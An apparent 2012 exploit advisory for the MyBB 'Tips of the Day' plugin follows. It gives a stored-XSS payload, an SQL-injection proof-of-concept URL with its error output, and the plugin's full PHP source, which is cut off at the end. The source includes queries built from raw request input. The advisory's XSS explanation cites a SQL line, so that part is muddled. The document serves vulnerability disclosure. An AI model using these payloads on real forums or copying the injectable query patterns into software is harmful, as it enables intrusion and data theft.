# Exploit Title: TipsOfTheDay mybb plugin stored XSS and SQL injection vulnerabilitys.
# Date: 12.12.2012
# Exploit Author: VipVince
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://mods.mybb.com/view/tips-of-the-day
# Version: 1.0
# Tested on: Windows

The tipsoftheday.php file is vulnerable to two common web vulnerability's. I will demonstrate below:

**********************************Stored XSS.**********************************************

The vulnerability lies here.

<?php

$query = $db->simple_select("tipsoftheday_users", "*", "totdid=".$mybb->input['approve']);

?>

And can be exploited here.

http://www.server.com/dir/misc.php?tips=newtip


Add <script>alert(/xss/)</script> into the boxes as newtip and then refresh the page. Bingo our stored XSS pop up.


**************************************** SQLi Vuln ***************************************************

<?php

$query = $db->simple_select("tipsoftheday", "*", "totdid=".$mybb->input['tip']);
$tip = $db->fetch_array($query);

?>

As you can see has not been sanitized.


It can be exploited via admin panel. POC below:

http://www.server.com/bladir/admin/index.php?module=config-tipsoftheday&action=edittip&tip=[VAILD_ID]'[SQLi]

Result.

[quote]
MyBB has experienced an internal SQL error and cannot continue.
SQL Error:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Query:
SELECT * FROM mybb_tipsoftheday WHERE totdid=1' 
[/quote]

Brought to you by VipVince. Enjoy the 12/12/2012 "it only comes once" and all that bullshit.


<?php

if(!defined("IN_MYBB"))
{
	die("Direct initialization of this file is not allowed.<br /><br />Please make sure IN_MYBB is defined.");
}

$plugins->add_hook("admin_config_menu", "tipsoftheday_admin_nav");
$plugins->add_hook("admin_config_action_handler", "tipsoftheday_action_handler");
$plugins->add_hook("admin_load", "tipsoftheday_admin");
$plugins->add_hook("index_start", "tipsoftheday_index");
$plugins->add_hook("misc_start", "tipsusers");


function tipsoftheday_info()
{
	global $lang;
	$lang->load("config_tipsoftheday", false, true);	
	return array(
		"name"			=> $lang->name,
		"description"	=> $lang->descriptionplugin,
		"website"		=> "http://mybb-es.com",
		"author"		=> "Edson Ordaz",
		"authorsite"	=> "http://mybb-es.com",
		"version"		=> "1.0",
		"guid" 			=> "f52d89922b319c5256b23cd1b3f09eb1",
		"compatibility" => "*"
	);
}

function tipsoftheday_activate()
{
	global $db,$lang,$message;
	$message .= $lang->activatemessage;
	$lang->load("config_tipsoftheday", false, true);	
	if(!$db->table_exists("tipsoftheday") && !$db->table_exists("tipsoftheday_users"))
	{
		$db->query("CREATE TABLE IF NOT EXISTS `".TABLE_PREFIX."tipsoftheday` (
		  `totdid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
		  `uid` int(10) NOT NULL,
		  `tiptle` text NOT NULL DEFAULT '',
		  `tip` text NOT NULL DEFAULT '',
		  PRIMARY KEY (`totdid`)
		) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;");
		
		$db->query("CREATE TABLE IF NOT EXISTS `".TABLE_PREFIX."tipsoftheday_users` (
		  `totdid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
		  `uid` int(10) NOT NULL,
		  `tiptle` text NOT NULL DEFAULT '',
		  `tip` text NOT NULL DEFAULT '',
		  PRIMARY KEY (`totdid`)
		) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;");
	}
	$tipsoftheday = array(
		"tid" => "NULL",
		"title"		=> 'tipsoftheday',
		"template"	=> $db->escape_string('<style>
.tipoftheday{
	display: block;
	top:10px;
	left:10px;
	width:90%;
	border:3px solid #FFD324;
	background:#FFF6BF top left no-repeat;
	padding:8px 8px 8px;
	font-size:11px;
	-moz-border-radius: 10px;
	-webkit-border-radius: 10px;
	border-radius: 10px;
	-moz-box-shadow: 0px 0px 10px #777777;
	-webkit-box-shadow: 0px 0px 10px #777777;
	box-shadow: 0px 0px 10px #777777;
}
</style>

<span class="tipoftheday">
<strong>{$tip[\'tiptle\']}</strong><br />
{$tip[\'tip\']}
</span>
<br />'),
		"sid" => "-1",
	);
	$tipsoftheday_newtip = array(
		"tid" => "NULL",
		"title"		=> 'tipsoftheday_newtip',
		"template"	=> $db->escape_string('<html>
<head>
<title>{$lang->newtiptab}</title>
{$headerinclude}
</head>
<body>
{$header}
<form action="misc.php?tips=do_newtip" method="post" enctype="multipart/form-data" name="input">
<input type="hidden" name="my_post_key" value="{$mybb->post_code}" />
<table border="0" cellspacing="{$theme[\'borderwidth\']}" cellpadding="{$theme[\'tablespace\']}" class="tborder">
<tr>
<td class="thead" colspan="2"><strong>{$lang->newtiptab}</strong></td>
</tr>
<tr>
<td class="trow2" width="15%"><strong>{$lang->newtipsubject}</strong></td>
<td class="trow2"><input type="text" class="textbox" name="tiptle" size="60" maxlength="85" value="{$tiptle}" tabindex="1" /></td>
</tr>
<tr>
<td class="trow2" valign="top"><strong>{$lang->newtipbody}</strong></td>
<td class="trow2">
<textarea name="tip" rows="5" cols="70" tabindex="2">{$tip}&lt;/textarea&gt;
</td>
</tr>
</table>
<br /><div style="text-align:center">
<input type="submit" class="button" name="submit" value="{$lang->sendtipadmins}" tabindex="4" accesskey="s" /> 
<br /></div>
</form>
{$footer}
</body>
</html>'),
		"sid" => "-1",
	);
	$db->insert_query("templates", $tipsoftheday);
	$db->insert_query("templates", $tipsoftheday_newtip);
	require_once MYBB_ROOT."/inc/adminfunctions_templates.php";
	find_replace_templatesets('index', '#{\$header}#', '{\$header}{$tips}');
	$updatetips = array(
			'uid' => 1,
			'tiptle' => $db->escape_string($lang->templatitle),
			'tip' => $db->escape_string($lang->templatbody)
	);
	$db->insert_query("tipsoftheday", $updatetips);
}


function tipsoftheday_deactivate()
{
	global $db;
	$db->drop_table("tipsoftheday");
	$db->drop_table("tipsoftheday_users");
	$db->delete_query("templates","title = 'tipsoftheday'");
	$db->delete_query("templates","title = 'tipsoftheday_newtip'");
	require MYBB_ROOT."/inc/adminfunctions_templates.php";
	find_replace_templatesets("index", '#{\$tips}#ism', "");
}


class Tips_Send_User {

	/*
	* Static tips
	*
	*/
	private static $tips;
	
	/*
	* Class tips
	*
	*/
	public static function Tips()
	{
		if(!is_object($tips))
		{
			$tips = new self;
		}

		return $tips;
	}
	
	/*
	* Verificar titulo
	* Tip enviado por miembro del foro
	*
	*/
	public function verify_title($title)
	{
		global $mybb,$lang;
		if(my_strlen(trim_blank_chrs($title)) > 5)
		{
			return true;
		}
		else
		{
			error($lang->tiptleminchars,$lang->name);
		}
	}
	
	/*
	*Verificar cuerpo del tip
	* Enviado por usuario del foro
	* Esperando aprobacion
	*
	*/
	public function verify_tip($tip)
	{
		global $mybb,$lang;
		if(my_strlen(trim_blank_chrs($tip)) > 15)
		{
			return true;
		}
		else
		{
			error($lang->tipbodyminchars,$lang->name);
		}
	}
	
	/*
	* Subir tip a tabla de tips
	* Esperando aprobacion
	*
	* Si se aprueba se muestra
	*
	*/
	public function update_new_tip($title,$tip,$uid)
	{
		global $db,$lang;
		$updatetips = array(
			'uid' => $uid,
			'tiptle' => $db->escape_string($title),
			'tip' => $db->escape_string($tip)
		);
		$totdid = $db->insert_query("tipsoftheday_users", $updatetips);
		redirect("index.php",$lang->sendpet);
	}
	
	/*
	* Tips
	* Pagina de usuarios
	* Pagina para el foro donde
	* Los usuarios envian tips al staff
	* Desde ACP son moderados
	* Para ser mostrados o no
	*
	*/
	public function Tips_Users()
	{
		global $db,$mybb,$templates,$theme;
		global $header,$headerinclude,$footer,$lang;
		$lang->load("admin/config_tipsoftheday", false, true);
		if($mybb->input['tips'] != "newtip" && $mybb->input['tips'] != "do_newtip")
		{
			return;
		}
		if($mybb->input['tips'] == "do_newtip" && $mybb->request_method == "post")
		{
			verify_post_check($mybb->input['my_post_key']);
			$this->verify_title($mybb->input['tiptle']);
			$this->verify_tip($mybb->input['tip']);
			$this->update_new_tip($mybb->input['tiptle'],$mybb->input['tip'],$mybb->user['uid']);
		}
		if($mybb->user['uid'] == 0)
		{
			error_no_permission();
		}
		add_breadcrumb($lang->addcreateheader);
		eval("\$newtip = \"".$templates->get("tipsoftheday_newtip")."\";");
		output_page($newtip);
	}
}


class tipsadmin 
{
	/*
	* Admin Tip 
	* TipsAdmin
	*
	*/
	private static $admintip;
	
	/*
	* Returns class
	*
	*/
	public static function TipsAdmin()
	{
		if(!is_object($admintip))
		{
			$admintip = new self;
		}

		return $admintip;
	}
	
	/*
	* Construct class
	*
	*/
	public function __construct()
	{
		$this->tipsoftheday = new tipsoftheday();
	}
	
	/*
	* Nav admin
	*
	*/
	public function AdminNav(&$nav)
	{
		global $mybb,$lang;
		$lang->load("config_tipsoftheday", false, true);	
		end($nav);
		$key = (key($nav))+10;
		if(!$key)
		{
			$key = '110';
		}	
		$nav[$key] = array('id' => "tipsoftheday", 'title' => $lang->name, 'link' => "index.php?module=config-tipsoftheday");
	}
	
	/*
	* Admin Load
	*
	*/
	public function AdminTips()
	{	
		global $mybb, $db, $page, $cache, $lang;
		if($page->active_action != "tipsoftheday")
		{
			return;
		}
		$page->add_breadcrumb_item($lang->name);
		$page->output_header($lang->name);
		
		$this->action_save($mybb->input['tiptle'],$mybb->input['tip'],$mybb->user['uid']);
		$this->newtip();
		$this->deletetip();
		$this->edittip();
		$this->requests();
		$this->approve();
		$this->reject();
		$this->edittemplate();
		$this->templatenewtip();
		$this->savetemplate();
		$this->savetemplatenews();
		$this->saveedit();
			
		$this->tabs("tips");
		$this->tabletips($mybb->post_code);
		$page->output_footer();
	}
	
	/*
	* Guarda el tip del dia
	* Envia funcion
	*
	*/
	public function action_save($tiptle,$tip,$uid)
	{
		global $mybb;
		if($mybb->input['action'] == "save")
		{
			$this->tipsoftheday->Save_Tip($tiptle,$tip,$uid);
		}
	}
	
	/*
	* Pestañas de Configuracion
	*
	*/
	public function tabs($location)
	{
		global $page,$lang,$mybb;
		$lang->requeststabdes = $lang->sprintf($lang->requeststabdes, $mybb->settings['bburl']."/misc.php?tips=newtip");
		$tabs["tips"] = array(
		'title' => $lang->name,
		'link' => "index.php?module=config-tipsoftheday",
		'description' => $lang->tipsdestabs
		);
		$tabs["newtip"] = array(
			'title' => $lang->newtiptab,
			'link' => "index.php?module=config-tipsoftheday&action=newtip",
			'description' => $lang->newtiptabdes
		);
		$tabs["requests"] = array(
			'title' => $lang->requeststab,
			'link' => "index.php?module=config-tipsoftheday&action=requests",
			'description' => $lang->requeststabdes
		);
		if($location == "template" || $location == "usertips")
		{
			$lang->templatetab = $lang->nametabindex;
		}
		$tabs["template"] = array(
			'title' => $lang->templatetab,
			'link' => "index.php?module=config-tipsoftheday&action=template",
			'description' => $lang->templatetabdes
		);
		if($location == "template" || $location == "usertips")
		{
			$tabs["usertips"] = array(
				'title' => $lang->usertipstab,
				'link' => "index.php?module=config-tipsoftheday&action=templatenewtip",
				'description' => $lang->usertipstabdes
			);
		}
		$page->output_nav_tabs($tabs,$location);
	}
	
	/*
	* Guardar plantilla
	* Envia informacion
	* al siguiente class
	*
	*/
	public function savetemplate()
	{
		global $mybb,$db,$lang;
		if($mybb->input['action'] == "savetemplate")
		{
			if($mybb->input['continue'])
			{
				$this->tipsoftheday->savetemplate($mybb->input['template'],$mybb->user['uid']);
			}
			if($mybb->input['revert'])
			{
				$template = array(
					"template" => '<style>
.tipoftheday{
	display: block;
	top:10px;
	left:10px;
	width:90%;
	border:3px solid #FFD324;
	background:#FFF6BF top left no-repeat;
	padding:8px 8px 8px;
	font-size:11px;
	-moz-border-radius: 10px;
	-webkit-border-radius: 10px;
	border-radius: 10px;
	-moz-box-shadow: 0px 0px 10px #777777;
	-webkit-box-shadow: 0px 0px 10px #777777;
	box-shadow: 0px 0px 10px #777777;
}
</style>

<span class="tipoftheday">
<strong>{$tip[\\\'tiptle\\\']}</strong><br />
{$tip[\\\'tip\\\']}
</span>
<br />',
				);
				$db->update_query("templates", $template,"title='tipsoftheday'");
				$this->tipsoftheday->fmessage($lang->templatesave,"success","&action=template");
			}
		}
	}
	
	/*
	* Guardar plantilla
	* Peticiones
	*
	*/
	public function savetemplatenews()
	{
		global $mybb,$db,$lang;
		if($mybb->input['action'] == "savetemplatenews")
		{
			if($mybb->input['continue'])
			{
				$this->tipsoftheday->savetemplatenews($mybb->input['template'],$mybb->user['uid']);
			}
			if($mybb->input['revert'])
			{
				$template = array(
					"template" => '<html>
<head>
<title>{$lang->newtiptab}</title>
{$headerinclude}
</head>
<body>
{$header}
<form action="misc.php?tips=do_newtip" method="post" enctype="multipart/form-data" name="input">
<input type="hidden" name="my_post_key" value="{$mybb->post_code}" />
<table border="0" cellspacing="{$theme[\\\'borderwidth\\\']}" cellpadding="{$theme[\\\'tablespace\\\']}" class="tborder">
<tr>
<td class="thead" colspan="2"><strong>{$lang->newtiptab}</strong></td>
</tr>
<tr>
<td class="trow2" width="15%"><strong>{$lang->newtipsubject}</strong></td>
<td class="trow2"><input type="text" class="textbox" name="tiptle" size="60" maxlength="85" value="{$tiptle}" tabindex="1" /></td>
</tr>
<tr>
<td class="trow2" valign="top"><strong>{$lang->newtipbody}</strong></td>
<td class="trow2">
<textarea name="tip" rows="5" cols="70" tabindex="2">{$tip}&lt;/textarea&gt;
</td>
</tr>
</table>
<br /><div style="text-align:center">
<input type="submit" class="button" name="submit" value="{$lang->sendtipadmins}" tabindex="4" accesskey="s" /> 
<br /></div>
</form>
{$footer}
</body>
</html>',
				);
				$db->update_query("templates", $template,"title='tipsoftheday_newtip'");
				$this->tipsoftheday->fmessage($lang->templatesave,"success","&action=templatenewtip");
			}
		}
	}
	
	/*
	* Tabla de Tips
	*
	*/
	function tabletips($mpcode)
	{
		global $db,$lang,$mybb;
		$query = $db->simple_select('tipsoftheday', 'COUNT(totdid) AS tips', '', array('limit' => 1));
		$quantity = $db->fetch_field($query, "tips");
		$pagina = intval($mybb->input['page']);
		$perpage = 15;
		if($pagina > 0)
		{
			$start = ($pagina - 1) * $perpage;
			$pages = $quantity / $perpage;
			$pages = ceil($pages);
			if($pagina > $pages || $pagina <= 0)
			{
				$start = 0;
				$pagina = 1;
			}
		}
		else
		{
			$start = 0;
			$pagina = 1;
		}
		$pageurl = "index.php?module=config-tipsoftheday";
		$table = new Table;
		$table->construct_header($lang->user, array("width" => "10%"));
		$table->construct_header($lang->title, array("width" => "10%"));
		$table->construct_header($lang->tip, array("width" => "70%"));
		$table->construct_header($lang->edit, array("width" => "5%"));
		$table->construct_header($lang->delete, array("width" => "5%"));
		$table->construct_row();

		$query = $db->query('SELECT * FROM '.TABLE_PREFIX.'tipsoftheday ORDER BY totdid DESC LIMIT '.$start.', '.$perpage);
		while($tip = $db->fetch_array($query))
		{
			$lang->deletetippopup = $lang->sprintf($lang->deletetippopup, $tip['tiptle']);
			$table->construct_cell($this->tipsoftheday->username($tip[uid]));;
			$table->construct_cell($tip[tiptle]);
			$table->construct_cell($tip[tip]);
			$table->construct_cell("<a href=\"index.php?module=config-tipsoftheday&action=edittip&tip={$tip['totdid']}\" ><img src=\"styles/default/images/icons/custom.gif\" /></a>",array("class" => "align_center"));
			$table->construct_cell("<a href=\"index.php?module=config-tipsoftheday&action=deletetip&tip={$tip['totdid']}&my_post_key={$mpcode}\" onclick=\"return AdminCP.deleteConfirmation(this, '{$lang->deletetippopup}')\"><img src=\"styles/default/images/icons/delete.gif\" /> </a>",array("class" => "align_center"));
			$table->construct_row();
		}
		$table->output($lang->name);
		echo multipage($quantity, (int)$perpage, (int)$pagina, $pageurl);
	}
	
	/*
	* Tabla de peticiones
	*
	*/
	public function requests()
	{
		global $db,$lang,$page,$mybb;
		if($mybb->input['action'] == "requests")
		{
			$this->tabs("requests");
			$query = $db->simple_select('tipsoftheday_users', 'COUNT(totdid) AS tips', '', array('limit' => 1));
			$quantity = $db->fetch_field($query, "tips");
			$pagina = intval($mybb->input['page']);
			$perpage = 15;
			if($pagina > 0)
			{
				$start = ($pagina - 1) * $perpage;
				$pages = $quantity / $perpage;
				$pages = ceil($pages);
				if($pagina > $pages || $pagina <= 0)
				{
					$start = 0;
					$pagina = 1;
				}
			}
			else
			{
				$start = 0;
				$pagina = 1;
			}
			$pageurl = "index.php?module=config-tipsoftheday&action=requests";
			$table = new Table;
			$table->construct_header($lang->user, array("width" => "10%"));
			$table->construct_header($lang->title, array("width" => "10%"));
			$table->construct_header($lang->tip, array("width" => "70%"));
			$table->construct_header($lang->options, array("width" => "10%"));
			$table->construct_row();

			$query = $db->query('SELECT * FROM '.TABLE_PREFIX.'tipsoftheday_users ORDER BY totdid DESC LIMIT '.$start.', '.$perpage);
			while($tip = $db->fetch_array($query))
			{
				$lang->deletetippopup = $lang->sprintf($lang->deletetippopup, $tip['tiptle']);
				$table->construct_cell($this->tipsoftheday->username($tip[uid]));;
				$table->construct_cell($tip[tiptle]);
				$table->construct_cell($tip[tip]);
				$popup = new PopupMenu("tip_{$tip['totdid']}", $lang->options);
				$popup->add_item($lang->aprobe, "index.php?module=config-tipsoftheday&approve={$tip['totdid']}");
				$popup->add_item($lang->reject, "index.php?module=config-tipsoftheday&reject={$tip['totdid']}");
				$Popuss = $popup->fetch();
				$table->construct_cell($Popuss, array('class' => 'align_center'));
				$table->construct_row();
			}
			$table->output($lang->name);
			echo multipage($quantity, (int)$perpage, (int)$pagina, $pageurl);
			$page->output_footer();
		}
	}
	
	/*
	* Aprobar 
	* Peticion
	*
	*/
	public function approve()
	{
		global $mybb,$db,$lang;
		if($mybb->input['approve'])
		{
			$query = $db->simple_select("tipsoftheday_users", "*", "totdid=".$mybb->input['approve']);
			$tip = $db->fetch_array($query);
			$title = $tip[tiptle];
			$tipbody = $tip[tip];
			$user = $tip[uid];
			$db->query("DELETE FROM ".TABLE_PREFIX."tipsoftheday_users WHERE totdid='".intval($mybb->input['approve'])."'");
			$this->tipsoftheday->Save_Tip($title,$tipbody,$user);
		}
	}
	
	/*
	* Rechazar el tip
	*
	*/
	public function reject()
	{
		global $mybb,$lang,$db;
		if($mybb->input['reject'])
		{
			$query = $db->simple_select("tipsoftheday_users", "*", "totdid=".$mybb->input['reject']);
			$tip = $db->fetch_array($query);
			if(!$tip['totdid'])
			{
				$this->tipsoftheday->fmessage($lang->tipnotexists,"error","");
			}
			$db->query("DELETE FROM ".TABLE_PREFIX."tipsoftheday_users WHERE totdid='".intval($mybb->input['reject'])."'");
			$this->tipsoftheday->fmessage($lang->deletetipsuccess,"success","&action=requests");
		}
	}
	
	/*
	* Nuevo Tip
	* Formulario
	*
	*/
	public function newtip()
	{
		global $mybb,$page,$lang;
		if($mybb->input['action'] == "newtip")
		{
			$this->tabs("newtip");
			$form = new Form("index.php?module=config-tipsoftheday&action=save", "post");
			$form_container = new FormContainer($lang->newtiptab);
			$form_container->output_row($lang->newtipsubject, $lang->newtipsubjectdes, $form->generate_text_box('tiptle', "", array('id' => 'tiptle')), 'tiptle');
			$form_container->output_row($lang->newtipbody, $lang->newtipbodydes, $form->generate_text_area('tip', "", array('id' => 'tip')), 'tip');
			$form_container->end();

			$buttons[] = $form->generate_submit_button($lang->savetip);
			$form->output_submit_wrapper($buttons);
			$form->end();
			$page->output_footer();
		}
	}
	
	/*
	* Eliminacion de Tip
	* Recibe totdid
	*
	*/
	public function deletetip()
	{
		global $db,$mybb,$page,$lang;
		if($mybb->input['action'] == "deletetip")
		{
			$query = $db->simple_select("tipsoftheday", "*", "totdid=".$mybb->input['tip']);
			$tip = $db->fetch_array($query);
			if(!$tip['totdid'])
			{
				$this->tipsoftheday->fmessage($lang->tipnotexists,"error","");
			}
			if($mybb->input['no'])
			{
				admin_redirect("index.php?module=config-tipsoftheday");
			}
			if($mybb->request_method == "post")
			{
				$db->query("DELETE FROM ".TABLE_PREFIX."tipsoftheday WHERE totdid='".intval($mybb->input['tip'])."'");
				$this->tipsoftheday->fmessage($lang->deletetipsuccess,"success","");
			}
			else
			{
				$page->output_confirm_action("index.php?module=config-tipsoftheday");
			}
		}
	}
		
	/*
	* Editar Tip
	*
	*/
	public function edittip()
	{
		global $mybb,$db,$page,$lang;
		if($mybb->input['action'] == "edittip")
		{
			$this->tipsoftheday->verify_totdid($mybb->input['tip']);
			$this->tabs("tips");
			$query = $db->query("SELECT * FROM ".TABLE_PREFIX."tipsoftheday WHERE totdid=".$mybb->input['tip']);
			$tip = $db->fetch_array($query);
			$form = new Form("index.php?module=config-tipsoftheday&action=saveedit", "post");
			echo $form->generate_hidden_field("totdid", $tip[totdid]);
			echo $form->generate_hidden_field("autor", $tip[uid]);
			$form_container = new FormContainer($tip[tiptle]);
			$form_container->output_row($lang->newtipsubject, $lang->newtipsubjectdes, $form->generate_text_box('tiptle',$tip[tiptle], array('id' => 'tiptle')), 'tiptle');
			$form_container->output_row($lang->newtipbody, $lang->newtipbodydes, $form->generate_text_area('tip',$tip[tip], array('id' => 'tip')), 'tip');
			$form_container->end();

			$buttons[] = $form->generate_submit_button($lang->saveedittip);
			$form->output_submit_wrapper($buttons);
			$form->end();
			$page->output_footer();
		}
	}
	
	/*
	* Guardar edicion
	*
	*/
	public function saveedit()
	{	
		global $mybb;
		if($mybb->input['action'] == "saveedit")
		{
			$this->tipsoftheday->Save_Edit_Tip($mybb->input['totdid'],$mybb->input['tiptle'],$mybb->input['tip'],$mybb->input['autor']);
		}
	}
	
	/*
	* Editar Plantilla
	*
	*/
	public function edittemplate()
	{
		global $mybb,$db,$page,$lang;
		if($mybb->input['action'] == "template")
		{
			$this->tabs("template");
			$queryadmin=$db->simple_select('adminoptions','*','uid='.$mybb->user['uid']);
			$admin_options=$db->fetch_array($queryadmin);
			if($admin_options['codepress']!=0)
			{
				$page->extra_header='<link type="text/css" href="./jscripts/codepress/languages/codepress-mybb.css" rel="stylesheet" id="cp-lang-style" />
<script type="text/javascript" src="./jscripts/codepress/codepress.js"></script>
<script type="text/javascript">
		CodePress.language=\'mybb\';
</script>';
			}
			$query = $db->write_query("SELECT template FROM ".TABLE_PREFIX."templates WHERE title='tipsoftheday'");
			$template = $db->fetch_array($query);
			$form = new Form("index.php?module=config-tipsoftheday&action=savetemplate", "post");
			$form_container = new FormContainer("Editar Plantilla: ".$lang->name);
			$form_container->output_row($lang->edittemplatename."<em>*</em>",$lang->edittemplatenamedes, "<input type=\"text\" class=\"text_input\" value=\"tipsoftheday\" readonly=\"readonly\">");
			$form_container->output_row($lang->edittemplateset."<em>*</em>",$lang->edittemplatesetdes, "<select><option>{$lang->name}</option></select>");
			$form_container->output_row("","", $form->generate_text_area('template',$template['template'],array('id'=>'template','class'=>'codepress mybb','style'=>'width:100%;height:500px;')));
			$form_container->end();

			$buttons[] = $form->generate_submit_button($lang->savetemplate, array('name' => 'continue'));
			$buttons[] = $form->generate_submit_button($lang->backoriginal, array('name' => 'revert', 'onclick' => 'return confirm(\''.$lang->revertoriginalquestion.'\');'));
			$form->output_submit_wrapper($buttons);
			$form->end();
			
			if($admin_options['codepress']!=0)
			{
				echo '<script type="text/javascript">
		Event.observe(\'add_template\',\'submit\',function()
		{
			if($(\'template_cp\'))
			{
				var area=$(\'template_cp\');
				area.id=\'template\';
				area.value=template.getCode();
				area.disabled=false;
			}
		});
</script>';
			}
			$page->output_footer();
		}
	}
	
	/*
	* Editar plantilla
	* peticiones de tips
	*
	*/
	public function templatenewtip()
	{
		global $mybb,$db,$page,$lang;
		if($mybb->input['action'] == "templatenewtip")
		{
			$this->tabs("usertips");
			$queryadmin=$db->simple_select('adminoptions','*','uid='.$mybb->user['uid']);
			$admin_options=$db->fetch_array($queryadmin);
			if($admin_options['codepress']!=0)
			{
				$page->extra_header='<link type="text/css" href="./jscripts/codepress/languages/codepress-mybb.css" rel="stylesheet" id="cp-lang-style" />
<script type="text/javascript" src="./jscripts/codepress/codepress.js"></script>
<script type="text/javascript">
		CodePress.language=\'mybb\';
</script>';
			}
			$query = $db->write_query("SELECT template FROM ".TABLE_PREFIX."templates WHERE title='tipsoftheday_newtip'");
			$template = $db->fetch_array($query);
			$form = new Form("index.php?module=config-tipsoftheday&action=savetemplatenews", "post");
			$form_container = new FormContainer("Editar Plantilla: ".$lang->name);
			$form_container->output_row($lang->edittemplatename."<em>*</em>",$lang->edittemplatenamedes, "<input type=\"text\" class=\"text_input\" value=\"tipsoftheday_newtip\" readonly=\"readonly\">");
			$form_container->output_row($lang->edittemplateset."<em>*</em>",$lang->edittemplatesetdes, "<select><option>{$lang->name}</option></select>");
			$form_container->output_row("","", $form->generate_text_area('template',$template['template'],array('id'=>'template','class'=>'codepress mybb','style'=>'width:100%;height:500px;')));
			$form_container->end();

			$buttons[] = $form->generate_submit_button($lang->savetemplate, array('name' => 'continue'));
			$buttons[] = $form->generate_submit_button($lang->backoriginal, array('name' => 'revert', 'onclick' => 'return confirm(\''.$lang->revertoriginalquestion.'\');'));
			$form->output_submit_wrapper($buttons);
			$form->end();
			
			if($admin_options['codepress']!=0)
			{
				echo '<script type="text/javascript">
		Event.observe(\'add_template\',\'submit\',function()
		{
			if($(\'template_cp\'))
			{
				var area=$(\'template_cp\');
				area.id=\'template\';
				area.value=template.getCode();
				area.disabled=false;
			}
		});
</script>';
			}
			$page->output_footer();
		}
	}
}


class tipsoftheday {

	/**
	* Tips 
	*
	*/
	private static $tips;
	
	/*
	* Static class
	*
	*/
	public static function Tips()
	{
		if(!is_object($tips))
		{
			$tips = new self;
		}

		return $tips;
	}
	
	/*
	* Guarda el tip del dia
	*
	*/
	public function Save_Tip($subject,$body,$user)
	{
		global $db,$lang;
		$this->verify_tiptle($subject);
		$this->verify_tip($body);
		$updatetips = array(
			'uid' => (int)($user),
			'tiptle' => $db->escape_string($subject),
			'tip' => $db->escape_string($body)
		);
		$totdid = $db->insert_query("tipsoftheday", $updatetips);
		$this->fmessage($lang->savetipsuccess,"success","");
	}
	
	/*
	* Error de caracteres minimos
	* Titulo y Mensaje
	*
	*/
	public function fmessage($langerror,$type,$url)
	{
		flash_message($langerror, $type);
		admin_redirect("index.php?module=config-tipsoftheday".$url);
	}
	
	/*
	* Verifica el mensaje del tip
	* Verificar si existen los caracteres correctos
	* Verificar que el mensaje no este vacio
	*
	*/
	public function verify_tip($tip)
	{
		global $mybb,$lang;
		if(my_strlen(trim_blank_chrs($tip)) == 0)
		{
			$this->fmessage($lang->tipbodyempty,"error","&action=newtip");
		}
		else if(strlen($tip) < 10)
		{
			$this->fmessage($lang->tipbodyminchars,"error","&action=newtip");
		}
		else if(my_strlen($tip) < 10)
		{
			$this->fmessage($lang->tipbodyminchars,"error","&action=newtip");
		}
		return true;
	}
	
	/*
	* Verifica si existe usuario
	*
	*/
	public function verify_user($uid)
	{
		global $db,$lang;
		$query = $db->simple_select("users", "COUNT(*) as user", "uid='".intval($uid)."'", array('limit' => 1));
		if($db->fetch_field($query, 'user') == 1)
		{
			return true;
		}
		else
		{
			$this->fmessage($lang->usernotexists,"error","");
		}
	}
	
	/*
	* Verifica que exista el Tip
	*
	*/
	public function verify_totdid($id)
	{
		global $db,$lang;
		$query = $db->simple_select("tipsoftheday", "COUNT(*) as tip", "totdid='".intval($id)."'", array('limit' => 1));
		if($db->fetch_field($query, 'tip') == 1)
		{
			return true;
		}
		else
		{
			$this->fmessage($lang->tipnotexistserror,"error","");
		}
	}
	
	/*
	* Verficar que el titulo 
	* del tip no este vacio
	*
	* Solo necesita 3 caracteres para poder enviarse
	*
	*/
	public function verify_tiptle($tip)
	{
		global $mybb,$lang;
		if(my_strlen(trim_blank_chrs($tip)) > 3)
		{
			return true;
		}
		else
		{
			$this->fmessage($lang->tiptleminchars,"error","&action=newtip");
		}
	}
	
	/*
	* Verificar la plantilla
	* Verificar que no se encuentre vacia
	*
	*/
	public function verify_template($template,$url)
	{
		global $mybb,$lang;
		if(my_strlen(trim_blank_chrs($template)) != 0)
		{
			return true;
		}
		else
		{
			$this->fmessage($lang->templateminchars,"error",$url);
		}
	}
	
	/*
	* Formato de Nombre
	* Nombre con Color
	* Color del grupo Obtenido
	*
	*/
	public function username($uid)
	{
		global $db,$cache,$groupscache;
		$query_users = $db->simple_select("users", "*", "uid=".$uid);
		while($user = $db->fetch_array($query_users))
		{
			$groupscache = $cache->read("usergroups");
			$ugroup = $groupscache[$user['usergroup']];
			$format = $ugroup['namestyle'];
			$userin = substr_count($format, "{username}");
			if($userin == 0)
			{
				$format = "{username}";
			}
			$format = stripslashes($format);
			$username = str_replace("{username}", $user['username'], $format);
		}
		return $username;
	}
	
	/*
	* Guardar Plantilla
	*
	*/
	public function savetemplate($template,$uid)
	{
		global $mybb,$db,$lang;
		$this->verify_user($uid);
		$this->verify_template($template);
		$template = array(
			"template" => $db->escape_string($template)
		);
		$db->update_query("templates", $template,"title='tipsoftheday'");
		$this->fmessage($lang->templatesave,"success","&action=template");
	}
	
	/*
	* Guarda la plantilla
	* Petiiones
	*
	*/
	public function savetemplatenews($template,$uid)
	{
		global $mybb,$db,$lang;
		$this->verify_user($uid);
		$this->verify_template($template,"&action=templatenewtip");
		$template = array(
			"template" => $db->escape_string($template)
		);
		$db->update_query("templates", $template,"title='tipsoftheday_newtip'");
		$this->fmessage($lang->templatesave,"success","&action=templatenewtip");
	}
	
	/*
	* Guarda edicion de Tip
	*
	*/
	public function Save_Edit_Tip($id,$subject,$body,$uid)
	{
		global $db,$lang;
		$this->verify_tiptle($subject);
		$this->verify_tip($body);
		$this->verify_user($uid);
		$this->verify_totdid($id);
		
		$editupdate = array(
			'uid' => (int)($uid),
			'tiptle' => $db->escape_string($subject),
			'tip' => $db->escape_string($body)
		);
		$db->update_query("tipsoftheday", $editupdate,"totdid=".$id);
		$this->fmessage($lang->editsuccesssave,"success","");
	}
	
	/*
	* Funcion para mostrar Tip
	*
	*/
	public function Index_tips()
	{
		global $mybb,$tips,$db,$templates;
		$query = $db->query("SELECT * FROM ".TABLE_PREFIX."tipsoftheday ORDER BY RAND() LIMIT 1;");
		$tip = $db->fetch_array($query);
